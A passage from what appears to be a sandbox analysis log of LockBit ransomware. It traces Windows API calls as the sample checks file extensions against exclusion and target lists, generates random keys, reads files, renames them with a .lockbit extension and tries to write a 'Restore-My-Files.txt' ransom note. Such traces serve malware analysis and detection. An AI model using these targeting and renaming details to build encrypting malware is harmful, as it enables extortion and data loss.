(lpString1=".cmd", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.981] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.981] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105506.WMF") returned 1 [0138.981] lstrcmpiW (lpString1="ntldr", lpString2="J0105506.WMF") returned 1 [0138.981] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105506.WMF") returned 1 [0138.981] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105506.WMF") returned -1 [0138.981] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105506.WMF") returned -1 [0138.981] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105506.WMF") returned 1 [0138.981] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105506.WMF") returned -1 [0138.981] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.981] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned=".WMF" [0138.982] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.982] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.982] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.982] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF.lockbit") returned 72 [0138.982] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105506.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0138.983] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.983] malloc (_Size=0x40068) returned 0x3df0008 [0138.983] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2912) returned 1 [0138.983] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.984] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.984] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.984] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.984] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.988] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.988] malloc (_Size=0xa6) returned 0x77d7a8 [0138.988] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0138.988] free (_Block=0x77d7a8) [0138.988] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.988] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.988] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.989] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7c44, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105520.WMF", cAlternateFileName="")) returned 1 [0138.989] lstrcmpiW (lpString1=".", lpString2="J0105520.WMF") returned -1 [0138.989] lstrcmpiW (lpString1="..", lpString2="J0105520.WMF") returned -1 [0138.989] PathFindExtensionW (pszPath="J0105520.WMF") returned=".WMF" [0138.989] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.989] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.989] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105520.WMF") returned 1 [0138.990] lstrcmpiW (lpString1="ntldr", lpString2="J0105520.WMF") returned 1 [0138.990] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105520.WMF") returned 1 [0138.990] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105520.WMF") returned -1 [0138.990] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105520.WMF") returned -1 [0138.990] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105520.WMF") returned 1 [0138.990] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105520.WMF") returned -1 [0138.990] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.990] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned=".WMF" [0138.990] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.990] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.990] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.991] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.991] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF.lockbit") returned 72 [0138.991] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105520.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0138.992] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.992] malloc (_Size=0x40068) returned 0x3df0008 [0138.992] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=31812) returned 1 [0138.992] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.992] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.992] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.993] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.993] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.997] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.997] malloc (_Size=0xa6) returned 0x77d7a8 [0138.997] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.999] free (_Block=0x77d7a8) [0138.999] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.000] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.000] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.000] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x43b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105526.WMF", cAlternateFileName="")) returned 1 [0139.000] lstrcmpiW (lpString1=".", lpString2="J0105526.WMF") returned -1 [0139.000] lstrcmpiW (lpString1="..", lpString2="J0105526.WMF") returned -1 [0139.000] PathFindExtensionW (pszPath="J0105526.WMF") returned=".WMF" [0139.000] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.000] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.001] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105526.WMF") returned 1 [0139.001] lstrcmpiW (lpString1="ntldr", lpString2="J0105526.WMF") returned 1 [0139.001] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105526.WMF") returned 1 [0139.001] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105526.WMF") returned -1 [0139.001] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105526.WMF") returned -1 [0139.001] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105526.WMF") returned 1 [0139.001] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105526.WMF") returned -1 [0139.001] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.001] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned=".WMF" [0139.001] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.001] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.002] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.002] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.002] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF.lockbit") returned 72 [0139.002] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF" (normalized: 